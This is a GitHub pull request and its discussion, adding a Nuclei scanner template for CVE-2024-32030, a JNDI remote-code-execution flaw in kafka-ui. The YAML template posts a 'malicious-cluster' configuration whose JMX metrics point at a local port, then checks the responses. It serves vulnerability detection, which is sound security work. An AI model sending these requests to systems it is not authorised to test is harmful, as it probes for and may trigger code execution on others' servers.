Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add CVE-2024-32030 Nuclei Template #10096

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open

Add CVE-2024-32030 Nuclei Template #10096

wants to merge 1 commit into from

Conversation

huseyinstif
Copy link

Template / PR Information

Template Validation

I've validated this template locally?

  • YES
  • NO
@DhiyaneshGeek DhiyaneshGeek self-assigned this Jun 24, 2024
@GeorginaReeder
Copy link

Thanks for your contribution @huseyinstif !
@DhiyaneshGeek
Copy link
Member

Hi @huseyinstif

Is it possible to share set-up instructions like docker to setup locally of this ?

Thanks
@huseyinstif
Copy link
Author

Hello,
You're welcome @GeorginaReeder
Of course you can find it here @DhiyaneshGeek
https://github.com/provectus/kafka-ui

Thank you
@nikilokitokinoki
Copy link

Hello,
The template gives false-positive results, looking for words that are in the error/exception response.
image_2024-06-24_21-56-21
@huseyinstif
Copy link
Author

Hello, @nikilokitokinoki
Is it better?

id: CVE-2024-32030

info:
  name: CVE-2024-32030 JMX Metrics Collection JNDI RCE
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-32030 JMX Metrics Collection JNDI Resolution Remote Code Execution Vulnerability.
    This template checks for the presence of the vulnerability by attempting to connect to a malicious JMX server.
  tags: cve,cve2024,jmx,rce,cve2024-32030

requests:
  - method: POST
    path:
      - "{{BaseURL}}/api/clusters"
    headers:
      Content-Type: "application/json"
    body: |
      {
        "name": "malicious-cluster",
        "bootstrapServers": ["127.0.0.1:1718"],
        "metrics": {
          "type": "JMX",
          "port": 1718
        }
      }
    matchers:
      - type: word
        part: body
        words:
          - '"name":"malicious-cluster"'
        condition: and
      - type: word
        part: body
        words:
          - '"bootstrapServers":["127.0.0.1:1718"]'
        condition: and
      - type: word
        part: body
        words:
          - '"metrics":{"type":"JMX","port":1718}'
        
  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster"
    matchers:
      - type: word
        part: body
        words:
          - '"name":"malicious-cluster"'
        condition: and
      - type: word
        part: body
        words:
          - '"bootstrapServers":["127.0.0.1:1718"]'
        condition: and
      - type: word
        part: body
        words:
          - '"metrics":{"type":"JMX","port":1718}'
        
  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster/metrics"
    matchers:
      - type: word
        part: body
        words:
          - '"metrics":{'
        condition: and
      - type: word
        part: body
        words:
          - '"jmx":{'
@nikilokitokinoki
Copy link

Thanks for the reply, can't give a definite answer as I guess my target list is not vulnerable to this CVE (and CVE-2023-52251), but no false positives now.
@huseyinstif
Copy link
Author

huseyinstif commented Jun 25, 2024
edited
Loading

Thanks,

Is there anything you expect from me? @nikilokitokinoki
@nikilokitokinoki
Copy link

No, thanks for your time)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
waiting for more info
4 participants
@huseyinstif @GeorginaReeder @DhiyaneshGeek @nikilokitokinoki